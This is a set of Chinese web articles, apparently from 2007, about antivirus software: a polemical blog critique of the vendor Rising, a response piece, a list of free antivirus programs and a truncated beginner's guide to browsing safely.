关于瑞星的彻底批判，一只老甲鱼的末路狂奔

关于瑞星的彻底批判，一只老甲鱼的末路狂奔

作者：徽剑

一、这年头就怕流氓有文化

二、瑞星的技术如何

三、瑞星的市场是如何做的

四、不断说谎的瑞星

五、不务正业，尽搞无赖公关

六、爬向生命终点

一、这年头就怕流氓有文化

问：流氓不可怕，就怕流氓有文化是什么意思?

答：一个没文化的流氓造势只能影响小范围，而流氓有了文化文化一旦形成将会影响整个社会！因为流氓多半是无理取闹，你完全可以据理力争，可流氓有了文化，就能把无理的说成有理的，没准儿还说得头头是道，让你无法与其斗争，所以流氓有了文化就很可怕。

近日，先是闹出诺顿把windows系统的两个底层相关的系统文件当病毒杀掉，造成用户操作系统蓝屏瘫痪的现象，本来杀毒软件杀错的事情也是很常见，在徽剑的记忆中，好像大多杀毒软件都这样的洋相。

但是这一次不同了，看看报道：

“5月18日，诺顿杀毒软件升级病毒库后，会把Windows XP系统的关键系统文件当作病毒清除，重启后系统将会瘫痪。瑞星公司表示，截至中午12点已有超过7千名个人用户和近百家企业用户向瑞星客户服务中心求助，更多用户由于系统繁忙无法打入电话。”

“5月19日，赛门铁克官方发表声明，并提出了解决问题的方法，确认是诺顿杀毒软件误删除XP系统文件导致系统崩溃，。声明中称，5月17日的更新程序错误地把微软简体中文Windows XP 中的2个系统文件当作木马程序进行了删除，从而造成Windows系统在重启后无法运行。并称在北京时间5月18日下午2:30已发布了LiveUpdate更新定义来更正这一事件。在错误检测后没有重新启动Windows系统的用户可以通过应用LiveUpdate的更新定义来解决这一问题。”

有评论说：诺顿杀毒软件“枪支走火”后，面对残局束手无策，当赛门铁克公司还没有反应过来的时候，国内三大杀毒公司江民、瑞星、金山公司却早已抢先一步，你一个声明，我一个公告，帮助这位昔日国际强敌，今日落难同行收拾残局。

这几天，各大IT网站就这个话题争论不休，特别是瑞星的枪手，几乎是遍地开花、上窜下跳。而几大公司的声明同时，也不免捎带说上几句自己产品的好话，不过到目前为止还没有哪一家敢附上“我公司产品绝对不会误杀”的字样！

不过很有意思的是，有人说：诺顿“误杀”用户为什么没有想到给赛门铁克打电话投诉，倒想起给其他杀毒公司打电话求救呢？

徽剑问一下：你买了戴尔的电脑出了问题，你会打电话给联想，问问如何处理吗？

由于瑞星是这次跳的最厉害的，这里就分析一下瑞星，看看瑞星的“光辉历史”。

二、瑞星的技术如何

先给一般人说说杀毒软件的技术知识，为了下面分析瑞星做点技术铺垫。

看一个杀毒软件的好坏，要看它真正能够识别病毒的能力，过去单纯通过病毒特征库的严格比对，来判别病毒的杀毒方式总是会慢半拍。因此用户只得无奈的把杀软的落后杀毒方式比喻成“过期药”。经过多年来杀毒软件厂商不断技术研发和杀软产品一次又一次的更新换代，以主动防御功能为主要特征的新一代防病毒体系已经完全确立了起来，相应地各主流杀毒软件厂商也都围绕着“主动防御”使出了各自的看家本领。

启发杀毒技术就是“主动防御”中的一种，是现在对付未知威胁的主要手段。启发杀毒技术中最先进的动态启发分析技术会将应用程序的编码复制到杀毒软件的模拟缓冲区中，并使用特别的“技巧”模拟其执行。若在“模拟执行”中检测到可疑的动作，该程序将被归类为危险程序，并立即拦截。不同于以特征码为基础的方法，启发杀毒技术可以检测出已知和未知的病毒，但是如果启发杀毒技术控制的不好，会产生不少误报，这也是当前一些以启发著名的杀毒软件一直无法得到大型企业认可的原因。

从2006年开始，行为杀毒技术逐渐风行，行为杀毒工具是在应用程序执行时分析其行为，并拦截任何可能危险活动的行为。行为杀毒是在实际系统的环境中运作，所以被病毒欺骗的可能性几乎没有。先进的行为杀毒技术还甚至可以在未知的程序执行恶意活动后，恢复变更，借以还原系统至感染前的状态。

虚拟机技术在杀毒软件中现在也有非常多的运用，特别是在启发杀毒技术中，一些启发技术比较成熟的杀毒软件都在他们动态启发杀毒技术中运用了虚拟机技术。有统计数据显示，2约有90%以上是“加壳”病毒。所谓“加壳”，就是给恶性病毒包上杀毒软件难以识别的外壳，某些病毒甚至加了近10层外壳，如果用常规的解壳杀毒技术，很难彻底地层层解壳，并最终清除该病毒。虚拟机技术就是用软件先虚拟一套运行环境，让病毒先在该虚拟环境下运行，从而观察病毒的执行过程。这样，杀毒软件就可以在其“现出原形”之后通过特征码查毒法对其进行查杀。但是现在一些设计先进的病毒，能够识别出这种简化虚拟机环境和真实环境的差别，在这种环境下不发作！

据反病毒专家介绍：

虚拟机并不是新技术，目前微软、JAVA等虚拟机都已经十分成熟，在一台电脑上安装一个虚拟机和多个操作系统，已经成为许多评测人员和计算机病毒分析人员必需工作条件。而将虚拟机技术应用到杀毒方面，却是一个杀毒业界一直在追求和探索的课题。解决虚拟机技术至少应解决两大难题：

一是虚拟机技术面临的一个最大的难题就是如何解决资源占用问题，如果全部应用虚拟机技术话，分析一个加壳病毒需要3到5分钟的时间，而目前电脑中许多压缩加壳的文件，光分析这些文件耗用的时间和占用的资源，就足够成为一个很有耐心的人放弃这款杀毒软件理由了，目前国际上主流的杀毒厂商对应用虚拟机技术都比较保守，毕竟不能因为杀毒拖垮用户的电脑。

二是如果判断病毒标准的问题。尽管根据病毒定义而确立的 “传染”标准是明确的，但是，这个标准却是模糊的。一是要仿真传染条件，哪些条件感染病毒，怎样制造传播条件？如系统日期、感染对象的文件名等等，二是这个分析是通过动态执行分支屡试呢，还是通过返回头进行静态的指令过程分析？如果杀毒软件以病毒传染性标准定义作为判断标准的话？

所以，虽然许多人对特征码技术持有不同的看法，但是在很长一段时间内，特征码仍然是主要的杀毒技术，虚拟机技术只能起到补充和辅助的作用。通过以上分析可以看出，目前的杀毒软件中都包含了两种以上的技术，因为这些技术都在各自的领域有所专长，谁也不能完全取代谁，谁也不能做到能查杀所有病毒，必须互为补充。

上面介绍了杀毒软件的大致技术，这里来看看瑞星：

“12月5日，国内最大的信息安全厂商瑞星召开盛大的发布会，隆重推出年度旗舰级新品——“瑞星杀毒软件2007版”，该产品在全球安全业界首次将商用“虚拟机”技术应用到杀毒引擎中，结合Startup Scan（抢先杀毒）、未知病毒查杀等技术，对“多重加壳”等恶性顽固病毒的查杀能力实现重大突破，整体技术处于世界先进水平。”

新一代虚拟机脱壳引擎，瑞星公司宣称是历时4年研发出来的第八代引擎，不过这里很搞笑，难道瑞星一年可以出两代产品，不知道他们是怎么分代的，难道瑞星的技术进步神速？

先来看一下瑞星是如何吹嘘所谓的“Startup Scan独占式抢先杀毒技术”：

“碎甲技术击溃Rootkits，彻底清除顽固病毒，Rootkits是一种病毒编写技术，它像一层铠甲，将自身及指定的文件保护起来，使其它软件无法发现、修改或删除这些文件。目前，越来越多的流氓软件已开始采用此种技术进行自我保护。带有Rootkits的流氓软件和病毒就像练就了“金钟罩”、“铁布衫”，不除去这种保护伞，各种杀毒软件都无法对其进行彻底清除。瑞星公司经过对数百个Rootkits工具、使用该技术的病毒，流氓软件以及Windows驱动加载方式分析，并进行大量试验后，最终找到了一种高效的通用解决方法，并将其命名为“碎甲（Anti-Rootkits）”技术。“碎甲”技术通过对Windows驱动程序加载点进行拦截，当发现Rootkits时自动使其保护功能失效，就象穿甲弹击碎盔甲一样。目前，此技术可以有效对付600余种Rootkits，并且当有新的Rootkits出现时能够迅速地进行升级处理。”

事实上，rootkits 是一堆能窃取密码，监听网络流量，留下后门等的程序集，如果入侵者在系统中成功植入 rootkits ，一般人将很难发现已经被入侵，或是只是觉得系统“怪怪的”，却不知道哪边出了问题，而对于入侵者来说，将能轻易控制系统，而且通行无阻。Rootkit其实就是在WINDOWS启动时加载比较早的功能模块，WINDOWS的驱动程序就是应用的这种技术，既然瑞星可以提前加载，也就是使用的Rootkit技术。

一个关键的问题就是能保证能在病毒之前加载？相信很多人都遇到过杀毒软件被病毒禁止运行的时候吧？这就是病毒抢先运行了。这并不是什么世界领先技术，连流氓软件都用到这个技术了，看来瑞星还没有流氓软件使用的技术先进。

瑞星标榜自己的防火墙规则是多么多么丰富，其实，规则越多防火墙性能越差，比如瑞星每次上网，不断报告XX用户试图连接本机XX端口，该包已被拦截，每时每刻都在拦截信息，哪有这么多黑客会盯着你，其实有这么多规则顶用么？规则一多上网速度就越慢，每个探测端口的信息防火墙就要用近千条规则去衡量，神经啊

至于瑞星吹嘘的全球首创“虚拟机”技术，前面已经分析过了，首先，这项技术瑞星不是第一个使用，而且这项技术目前远没有到成熟的阶段，世界上没有那个杀毒厂商敢于真正全面引用，这里徽剑估计，如果瑞星的真的全面应用真正意义的“虚拟机”，那么你的CPU跑10GHZ也没什么用。因为全面应用真正意义的“虚拟机”杀毒，对于计算机系统性能的要求提高了成百上千倍。

三、瑞星的市场是如何做的

瑞星总是很得意以国内老大自居，那么我们来看看瑞星是如何做大市场的吧。

瑞星从当初只剩10万资金，同时还欠着15万广告费的窘境，到现今占据国内杀毒市场60%以上的份额的壮观。甚至于人们一提到病毒，就联想到瑞星。这个奇迹是谁创造的?是一个叫刘旭的。

有人说：瑞星的成就，或许对刘旭来说，是幸运的，但老天偏偏爱和他开玩笑，从一手成就瑞星的奇迹，再到被瑞星的原始出资人，一个卑鄙的商人王莘过河拆桥，再到自主研发的微点主动防御软件遭到官商勾结的封杀，这一路走来，或许刘旭已经不会感到幸运了，为他人做嫁衣，恩将仇报，这类事情发生在任何一个人身上，都是一种不幸…

为瑞星立下汗马功劳的刘旭被排挤出瑞星后，成立了自己的微点公司，推出了自己的杀毒软件，2005年6月21日，刘旭向北京市公安局公提出了备案申请。这个程序基本上都是第二天就完成了。结果网监处不仅不予备案，反而以“反病毒公司资质调查”、“未采取安全技术防范措施”为由，开始了对东方微点公司的调查。更为恶劣的是，在未出具任何合法手续的情况下，电脑竟被在光天化日之下直接送到了竞争对手——瑞星软件公司那里。网监处还给国家病毒防治产品检测中心发公函，要求其对微点产品不予检测。”

更诬陷在微点公司负责后勤的副总田亚葵于2004年12月21日19时许，在与互联网连接的过程中，运行或激活四种计算机病毒，致使与其使用同一路由器连接互联网的公司等用户感染计算机病毒，造成经济损失18万余元。涉嫌破坏计算机信息系统罪。2005年7月28日，在田亚葵经历了11月的含冤受屈后已经被海淀检察院释放。

2006年9月22日，《新京报》刊登了《瑞星诉东方微点侵犯商业秘密》等公关稿，瑞星公司称，“在北京东方微点公司进行‘微点主动防御软件’测试的移动硬盘中，使用了田亚葵提供的病毒样本，该样本与瑞星公司2002年10月之前与SOPHOS网站进行交换的样本完全一致”。事实上，东方微点公司和SOPHOS公司也进行病毒样本交换。

瑞星公司如何获得东方微点公司移动硬盘和病毒样本，究竟是谁窃取谁的“商业秘密”？

报道中瑞星公司称，“田亚葵到该公司任副总经理，主管研发工作”。田亚葵根本就不懂得反病毒技术，东方微点公司能让田亚葵主管研发工作吗？这显然是在造谣。

在微点封杀事件之前，瑞星的这种卑鄙手段已经不是第一次付诸在商业对手的身上了，在2004年8月份，瑞星就用相同伎俩打压金山公司的金山毒霸6的上市，因为毒霸资金力量雄厚和同样精于商业运作，所以没打压的住。

瑞星还有一大特点，那就是瑞星始终与“公安”结缘，在很多地方，甚至出现公安部门出面强制要求诸如网吧等安装瑞星产品的规定，这里面的猫腻就不用徽剑多说了。最搞笑的莫过于瑞星居然跟公安机关搞起了联手发布病毒播报，结果引起了其他厂商的不满。江民有关人士认为，“行政权利具有惟一性和独占性，公安机关是杀毒行业的主管部门，其公告在杀毒软件行业中的作用、威力和价值，与卫生主管部门的疾病疫情公告几近相同。瑞星与公安机关联手发布病毒播报的做法，对于其他杀毒厂商来说，有不公平竞争的嫌疑。江民在一份声明中呼吁，公安机关应停止与杀毒厂商合作进行病毒播报的做法，代之以独立、权威、严肃、科学和统一的病毒播报。”

徽剑给瑞星的市场策略终结了一下，

一是“拉”，拉虎皮、扯大旗。

二是“绊”，对竞争对手下绊子，使坏。

三是“贿”，对于那些品牌机等等

四是“骗”，通过各种途径做公关，骗消费者。

四、不断说谎的瑞星

这里来说一下瑞星的“骗”：

首先是宣传上的骗，瑞星不是大吹“虚拟机”杀毒吗？有技术人员指出：

“前两天发现瑞星把自家原来出的程序报毒了，就研究了一下．发现拿ＡＳＰ２．１２一类的东西，在特征位置随便动两下马上就认不出来了，这不还是特征识别、脚本脱壳吗？和宣传的好象不太一样．后来研读了一下广告宣传稿，发现瑞星的文案真是很强悍，心理暗示使用的相当有深度，而关键的技术完全只是个理论层面的概念．也许这个虚拟机指的是一般的ＰＥ加载器，还是通过一般的特征识别来调用写好的脚本脱壳，除了浪费内存，ＣＰＵ外和Ｋ８的静态脱壳方法没有任何特别之处，只能说是从原来什么壳都不会脱，进步到能脱一些简单压缩壳而已”。

“据说瑞星开发了n久虚拟机，并且虚拟机搞得“非常不错”，唯一的不足是这个虚拟机被错误地用在了错误的杀毒软件上面。导致现在瑞星提高的那点识别率远远低于提高的内存占用率。如果完全虚拟跑，会慢死，虚拟机吗，虚拟的再真实，也不会和真实机完全一样的。官方解释的很好啊 模拟了一个虚拟的环境 故称为虚拟机 但是VM到了什么程度 他就卡壳了~~”

瑞星对于卡巴斯基把瑞星卡卡杀掉不满，那么我们来看看卡卡是个什么东西吧，在360安全卫士推出并大获成功后，对于广告之类流氓插件一直保持和平共处的瑞星也积极了，推出了类似的瑞星卡卡。大家都以为是好事，结果没多久，狐狸尾巴出来了：

“因为众所周知的原因，我很讨厌3721，所以不用360度安全伪士（即使是中招），总担心那天这个伪士摇身一变成为更大的流氓。所以我选择了卡卡，毕竟是瑞星出的嘛，虽然瑞星杀毒垃圾，我用卡巴，但是流氓软件都是国内制造的，瑞星应该更了解、会有更好一些的办法。使用卡卡的感觉还不错，虽然他的进程管理设计的很垃圾，估计只有专业人士才能看懂，但是帮忙干掉了几个流氓软件，所以还是让他留在了我的电脑。”

看上去很正常，不过您往下看：

“今天打开卡卡，卡卡马上就自行进行了升级更新，再重新启动后的卡卡，让我倒吸了一口凉气，居然卡卡产生了如下的变化；任务栏增加一个其丑无比的图标，还以为是中招了，用卡卡查了一遍，没有发现什么问题，研究了好一阵子才发现那就是卡卡的图标，你卡卡不是清除工具吗？怎么跑到我的任务栏去了？更加令人吃惊的是点击卡卡的关闭按钮，其图标还是在任务栏中出现，在图标上无论是右键还是左键，均没有退出这个程序的选项，点击某个类似功能键后，居然跳出一个提示说：现在进入后台运行！虽然我的内存有1G，也许你卡卡并不会占用多少，但是你不能来侵占，你经过我同意了吗？卡卡向启动项添加自启动项目，并且仿佛是两个启动项；向ie浏览器添加流氓软件常用的ie插件；综合以上，我立马准备卸载卡卡了，你TMD反流氓，自己倒是先成为流氓了！”

还有对卡卡技术质疑的：“卡卡对流氓软件也太厉害了吧，宁可错杀一百，也不放过一个？搞的我正常的网页都不能浏览了。不能直接看网页中带的视频节目。。。这样我才重装系统的。没想到，重装后，杀毒软件又。。。由于相信瑞星，安装卡卡，最重要的是它是完全免费的，那玩意装上后我的IE就不再受我控制了，想看看该有的flash，想看看有的直播电影都不行，瑞星卡卡中连拦截什么东西都没有给用户选择，是何用意，无奈卸载卡卡，tmd居然还是不能显示该有的flash，我怀疑卡卡还是留了点东西在机子里。”

上面都是暗骗，瑞星对于用户还有明骗的时候，

“瑞星也算是国内做的较大的杀毒软件了我从99年起就试用，然而这次开始于12月18日瑞星升级服务器的换版风潮对这个公司也算是领教了，在这些年来用户们的帮助下成长起来的国内公司，现在创出了些名声开始抛弃他的支持者们了，开始食言他们以前的承诺了，难道这个公司真的强大到了这个地步了吗？不用作售后服务了吗？估计他们分析市场占有率的人员脑子进水了，他们的公司领导开始腐败了。”

“有没有搞错啊。我买2002版时，说是终身免费升级的哦。现在就改口，太奸了吧。开始为了支持国产买了瑞星.一直觉得不错.那是也是有因他说终身免费升级才买的..那时我的机子中只有瑞星是正版,其实软件都是翻版,还很自豪呢.真没想出瑞星原来也是这么无诚信的企业.失望”

还有更厉害的：

“昨天重新装了系统。重下载了rising。今天rising就不能升级了。说是产品序列号与用户ID不匹配。怎么解决呢？我的是季度卡，用了一个月左右吧。只有我一个人使用。并且在通行证里捆绑了的。这个问题怎么解决啊？”

明白吧，瑞星就是一个骗子。

五、瑞星的无赖公关

都说瑞星的枪多，这话这几天让徽剑大开眼界，不过很可惜，这些基本都是“烟枪”，除了到处给别人扣帽子和复制外，好像没别的本领。

看段报道：

2007年5月19日上午，卡巴斯基公司接到瑞星公司来电，称卡巴斯基反病毒软件将瑞星卡卡当作病毒“查杀”，要求卡巴斯基解决这一问题。卡巴斯基公司当即表示，卡巴斯基将在保障用户安全的前提下，立即安排病毒分析工程师对瑞星卡卡在用户计算机内的行为进行全面评估。鉴于卡巴斯基在全球均奉行“用户安全第一”的保护原则，对任何可能对计算机安全造成威胁的进程都会向用户提出警告，即使这些进程来自于商业软件。令人吃惊的是，卡巴斯基公司负责媒体宣传的部门很快发现互联网上出现了多篇以“卡巴斯基查杀瑞星卡卡 导致大量用户无法正常升级”为题、内容完全一样的新闻稿，最早的一篇于2007年5月19日15点05分43秒发布在瑞星官方网站上。

看到了吧，一环扣一环，那边的电话不过是为了这边的烟枪准备的。

看看这些评价：

“今天又看见了一篇文章：杀完瑞星又杀QQ。靠，QQ有后台监控这个大家都知道，而且杀QQ的事情还是在过年以前（07年1月），怎么这个时候拿来说？你玩穿越也太过分了吧。”

“星期五诺顿误杀造成用户电脑死机，且不说是不是微软在我们的电脑里装了什么远程控制程序，当QQ弹出这条新闻的时候，我竟然看见瑞星在JJYY。还是IT168说得好，人家不打电话到赛门铁克，干嘛找你瑞星啊，凭借这个出位，你们公关也太差了吧。”

“炒作吗那简直就是不用思考的事，这也是瑞星区别于其他两大国内杀毒软件的地方。绝大多数用户不会自己评测杀毒软件的性能，所以要想卖的好，首先要考虑的问题不是产品本身的品质，而是前期的宣传技巧，和进行心理暗示的方式手法。现在emulator脱壳还很不成熟，我觉得也就是咖啡的比较有气势，静态的只要抄K8的就好了，比如KV的。其实用静态对付就足以了，反正用壳的都是些木马蠕虫一类的，只要下的去狠心就行”

“瑞星的文案可以弥补开发的不足。”

还是一位网友说的好：“瑞星，让它吹牛去吧，我只佩服它在各个论坛的枪手之多，或许这本身就是一种营销方式，拼命打压其它杀毒软件——在KV的论坛说KV不如瑞星，在天网的论坛说天网不如瑞星防火墙，在金山的论坛说金山毒霸不如瑞星”。

六、爬向生命终点

其实，最痛苦的就是我们广大网民了。本来杀毒软件是用来看护系统的，结果整了个系统崩溃，数据丢失，还要费劲去修复，这也就算了，本来事无完美，我们也许还可以忍受错误，改正了就好。

至于瑞星的产品问题，大家随便到搜索引擎上去搜搜看吧，虽然大部分都不算是什么上得了台面的，可是用过杀毒软件的人都知道，瑞星一向是以“狠”出名的，别的杀毒软件杀不掉的，瑞星只要能查出来，基本上不存在“杀不掉”这回事——连们们业内的人都感叹，

现今瑞星的技术资本比别人差，只能用不正当的手段与他的竞争对手抗衡，瑞星的技术靠的是刘旭，刘旭被挤走后，瑞星的技术就开始一路下滑，一年一年的新版本，换汤不换药。要想立于不败之地讲的是实力，或许凭瑞星积累10余年的政府某部门的关系，能嚣张的了一时，但绝不能嚣张一世！相信有句话：正义终究会战胜邪恶的！

瑞星说：诺顿在企业用户中对他威胁大，卡巴在个人用户中威胁大。以前有微点被冤枉，这下卡巴和诺顿又成了靶子，下一个会是谁呢？

=============================

徽剑备注申明：

第一，周鸿祎没有给我的钱，否则我不会那样批迅雷。

第二，我没必要通过这个吸引周的注意，因为他老早就知道我了

第三，同样卡巴没有给我钱，因为我不懂俄文，联系不上。至于诺顿我是从来不用的。

第四，我从来不打枪，我的至爱是打炮。枪是虚的，炮是实的。

瑞星！瑞星？瑞星……　瑞星实力今何在

作者：T木　来源：赛迪网　

【编者按：在赛迪网的IT博客里看到了这篇文章，对瑞星的批判——这一阵围绕瑞星总在不停的“发生”着许多事情。孰是孰非，目的何在，应该只有当事人才能给出最准确的答案。正面的、负面的、有争议的，文章很多，再加一篇，共同思考——用户是不是就只能做“看客”！】

昨日看到赛迪网博友徽剑写的一篇文章，标题是《关于瑞星的彻底批判，一只老甲鱼的末路狂奔》。从标题上大家都能看得出来这是一个关于瑞星的负面文章。如果是发表在媒体正规页面上，那就该算是一篇负面稿件了。

这一阵最火的首当其冲必属赛门铁克无疑，而徽剑博友却选择了另一误杀事件的“受害者”——瑞星。刚看到题目和文首尚百思不得其解，待看完全文方恍然大悟。

误杀——被误杀——瑞星被误杀——瑞星，这就是一条完整的导火索，最终引爆了《关于瑞星的彻底批判，一只老甲鱼的末路狂奔》。

瑞星和我们的博友有什么深仇大恨么？博友在文中说的一句话很有意思“你买了戴尔的电脑出了问题，你会打电话给联想，问问如何处理吗？”关于赛门铁克误杀事件，虽然国内三大杀毒厂商都有诸多动作，不过最引人注目的却“仍然”是瑞星。

现在的防毒领域大有变被动为主动，由守株待兔到主动出击的动向。无论国内国外都纷纷推出自己的主动防御技术：启发杀毒、行为杀毒、虚拟机杀毒。新推出的技术有很多，各家都认为自己的更好些，但无可否认的是，现在最主流有效的杀毒方法仍然是特征码匹配。

而至于防火墙，真正的防火墙所依靠的并不在于规则。

其实，早几年前的一段时间，瑞星曾经很好用过，极少的漏杀、误杀，相对低的资源占用，实际的使用效果使得很多用户都选择了瑞星，并口口相传。但不知为何，大家开始发现瑞星所消耗的系统资源多了起来，杀毒的效率降了下去，本想关闭系统监控，它虽然收起了伞，却依然待在那里，原本吸引无数女性注意力的可爱小狮子，也开始不合时宜的跳来跳去。

这些让大家不喜欢的现象消失了嘛、解决了嘛、有所解释嘛——答案都是否定的。

实际上，杀毒软件也是一款产品，也有漏洞，会犯错误，而不是万能的灵丹妙药。大家需要去信任杀毒软件，但不应该认为只需要完全的依靠一款或几款产品就能彻底解决安全问题。

安全厂商成立的初衷可能不全相同，但现在，在拥有了众多员工的基础上，每个安全厂商首先要面对的绝对不是如何作出更好的产品，而是要先养活这些人，有了好的基础才能打造出好的产品，甚至更上一层楼。所以安全厂商的一切市场策略首先也是必须要先服从于“养活这些人”这个目标，然后才是其他。

关于病毒、关于安全厂商，我们总会不断的找出话题，我们总有说不完的东西。

我们会理解厂商，但更希望厂商在做产品、做宣传的时候能更多的站在理解用户的角度。

没了诺顿卡巴，我们还能用这些免费杀毒软件

没了诺顿卡巴，我们还能用这些免费杀毒软件

出处：PConline

不用盗版 用上正版杀毒软件上"正道"

　　这段时间杀毒界接连出了“诺顿误报致XP重复启动”和“卡巴斯基杀完卡卡杀QQ”事故。因为牵涉到的两家厂商都是国外知名的杀毒软件提供商，所以一时之间攻讦之语充斥整个互联网。

　　不过到底谁是谁非，谁有没有赔偿这些问题还是留给厂商和受害者自己去协调吧，对于普通的网友，我们关心的是现在上网有没有一款可以保障我们安全的杀毒软件，有没有一款能够免费又功能强大的软件提供给我们。

　　庆幸的是，国内外很多杀毒软件厂商都提供了免费的杀毒软件，这些软件使用起来一点版权问题都没有，也不会向你收一分钱，你只需要安上并使用即可。

　　好了，现在来看看King为大家收集的一些免费杀毒软件吧，不会用的话，绝大部分介绍后边都有相关使用教程。



　　一、AVG Antivirus

软件名称： AVG Antivirus

软件版本： 7.5.467

软件大小： 27000KB

软件授权： 免费

适用平台： Windows 98/Me/2000/XP

下载地址：点击这里下载

　　功能上相当完整，可即时对任何存取文件侦测，防止电脑病毒感染；可对电子邮件和附加文件进行扫瞄，防止电脑病毒透过电子邮件和附加文件传播；『病毒资料库』里面则记录了一些电脑病毒的特性和发作日期等相关资讯；『开机保护』可在电脑开机时侦测开机型病毒，防止开机型病毒感染。



图一 AVG的控制中心界面

　　在扫毒方面，可扫瞄磁碟片、硬盘、光盘机外，也可对网络磁碟进行扫瞄。在扫瞄时也可只对磁碟片、硬盘、光盘机上的某个目录进行扫瞄。可扫瞄文件型病毒、巨集病毒、压缩文件(支持ZIP，ARJ，RAR等压缩文件即时解压缩扫描)。



图二 检测中心

　　在扫瞄时如发现文件感染病毒时会将感染病毒的文件隔离至AVG Virus VauIt，待扫瞄完成后在一并解毒。现在提供了最新的免费版供大家使用，安装之前先去官方网站填个表，从回信中得到一个序列号。

完全免费!国外杀毒软件AVG新版试用!

二、Avast! Home

软件名称： Avast! Home

软件版本： 4.7.986 简体版

软件大小： 13600KB

软件授权： 免费

适用平台： Windows 98/Me/2000/XP

下载地址：点击这里下载

　　AVAST32 有全模块化的架构，它的引擎核心可与许多的客户端程序或 Plungin 配合。这软件可以侦测出大量的 Windows 9X/Me 或 Windows NT/XP/2000 环境下的已知病毒，甚至对那些无法直接侦测出的未知或变形病毒也可以。



图三 超酷的类似播放器的皮肤



图四 另外两款皮肤（一款蓝色，一款浅红褐色）

　　正确的使用防毒程序或数据保全措施（如备份），可以再计算机受到危害时将损失减到最低。

时尚的免费杀毒软件Avast！超酷登场

　　三、Avira AntiVir PersonalEdition Classic

软件名称： Avira AntiVir PersonalEdition Classic

软件版本： 7.00.04.15

软件大小： 17MB

软件授权： 免费

适用平台： Windows 98/Me/2000/XP

下载地址：点击这里下载

　　一款个人版本的防病毒软件，它能有效地保护个人电脑以及工作站的使用。它可以检测并移除超过50,000种病毒，支持网络更新。如今病毒横行天下，防毒软件是每台机器都必不可少的。



图四 查毒功能的主界面



图七 快速的即时更新界面

　　如果你不屑于用盗版的话，AntiVir是个很不错的选择哦！AntiVir的可靠性是经过多次对比试验和独立的商业纪录证明了的。

四、ClamWin Free Antivirus 0.90.1.1

软件名称： ClamWin Free Antivirus

软件版本： 0.90.1.1

软件大小： 5.56M

软件授权： 免费

适用平台： Windows 98/Me/2000/XP

下载地址：点击这里下载

　　软件简介：ClamWin是一套功能非常优秀的免费防毒软件。它的体积非常娇小，不会占用太多计算机资源，不像其它防毒软件安装之后会拖累整台计算机的速度。而且除了强大的文件与电子邮件防护能力之外，它还拥有排程扫描、在线更新病毒码、及时侦测等功能，和市面上知名防毒软件比起来一点也不逊色！

　　使用方法：安装就可以用了。建议英语好的朋友使用。

　　五、Active Virus Shield

软件名称： Active Virus Shield

软件版本： 6.0.308

软件大小： 13900 KB

软件授权： 免费

适用平台： Windows 98/Me/2000/XP

下载地址：点击这里下载

　　软件简介：美国在线AOL周一推出了一款免费的杀毒软件，更令人激动的是，这款软件实际上是由俄罗斯安全软件专家卡巴斯基为其编写的。软件包含了实时监控，邮件扫描，每小时自动更新等功能。



文件保护安全设置

　　除了基本的扫描防护和自动更新外，软件还有许多新的特性，如可在系统繁忙时让出资源，避免减慢系统速度等。



图9 Active Virus Shield邮件扫描结果

　　该安全软件还为迅驰笔记本电脑及超线程技术做了优化，支持64位Windows操作系统。

　　使用方法：到这里申请一个序列号就可以使用1年。精简了部分功能的卡巴斯基

六、McAfee VirusScan 10.0.27 简体版

软件名称： McAfee VirusScan

软件版本： 10.0.27

软件大小： 10.22MB

软件授权： 免费

适用平台： Windows 98/Me/2000/XP

下载地址：点击这里下载

　　软件简介：McAfee防毒软件, 除了操作介面更新外,也将该公司的WebScanX功能合在一起,增加了许多新功能! 除了帮你侦测和清除病毒，它还有VShield自动监视系统，会常驻在System Tray，当你从磁盘、网络上、E-mail夹文件中开启文件时便会自动侦测文件的安全性，若文件内含病毒，便会立即警告，并作适当的处理，而且支持鼠标右键的快速选单功能，并可使用密码将个人的设定锁住让别人无法乱改你的设定。



图

　　使用方法：安装之后使用电子邮箱注册，可以使用1年。安装之后有注册提示，按照提示一步一步进行就可以了

　　七、东方卫士

软件名称： 东方卫士

软件版本： 2007

软件大小： 13900KB

软件授权： 免费

适用平台： Windows 98/Me/2000/XP

下载地址：点击这里下载

　　PConline网友专享免费升级序列号：DFV3-PCOL0606-05357935-1219 （免费使用一个月）



图2 东方卫士的主界面

　　东方卫士V3（2007）下载版较之东方卫士2005在防毒功能和特色功能上作了更深入改进，具有超强的易用性和实用性。在防止个人资料被盗用方面，针对Adware、Spyware、木马病毒以及保护网游账号、银行密码等极大的增强了防护和查杀功能。通过“免疫、查杀、修复”做到了更安全、更稳定、更易用！



图5 东方网盾

　　东方卫士V3（2007）具有十项功能优势：1、超强病毒查杀 2、超高速杀毒 3、超低的系统资源占用 4、注册表扫描5、漏洞扫描主动修复 6、实时监控防护未知病毒 7、东方网盾个人防火墙 8、完善实用的备份 9清晰明了的状态显示 10、强大的隔离功能。

超酷!国产免费杀毒软件东方卫士试用

教新手几招让你网上冲浪更安全一些

教新手几招让你网上冲浪更安全一些

作者：我爱我家

　　你是否有这么一种的经历，本来好好的电脑，在浏览网页的时候，无端端的就中了病毒或流氓软件，导致系统运行变慢、帐号被盗、浏览器遭劫持。这是因为黑客们利用浏览器的漏洞，使得你在浏览网页的时候浏览器自动的在后台下载病毒木马程序，然后自动执行。

　　防范措施第一条 请个门卫守护城门 （安装杀毒软件）

　　要防范大多数病毒，杀毒软件是必不可少的。无论你使用的的哪种杀毒软件，最重要的就是升级杀毒软件和开启杀毒软件的实时监控功能。



图一 升级杀毒软件

　　升级杀毒软件是为了能查杀新的病毒，病毒库陈旧的杀毒软件就像摆设。病毒库最好每周更新一次，有条件的可以每天更新一次。

　　开启实时监控功能就像为系统请了个警察，这个警察负责检查即将进入城里的（新建的文件和程序）和在城里活动的（正在打开的文件和正在运行的程序）每个人的身份，把间谍和破坏者（木马和病毒）抓捕起来。没有开启杀毒软件的实时监控功能，你的电脑就像没有警察的城市，让木马和病毒任意横行。杀毒软件注重的是检查程序的好与坏。

　　防范措施第二条 请卫士守城墙 （安装防火墙）

　　防火墙的作用是阻止入侵者非法进入城市（防止黑客对你的电脑的入侵），同时也防范间谍把机密文件带出城。（防止木马把你的帐号密码及重要资料传到网络）。安装了防火墙，同样需要定期升级。在防火墙弹出对话框让你选择是否允许某某程序连接网路的时候，要注意判断该程序是否属于恶意程序。最简单的方法是记住该程序名然后到网上搜索一下。防火墙注重的是阻止程序（信息）的进与出。



图二 恶意软件企图访问网络

防范措施第三条 加固修补城墙 （升级windows 打齐系统补丁）

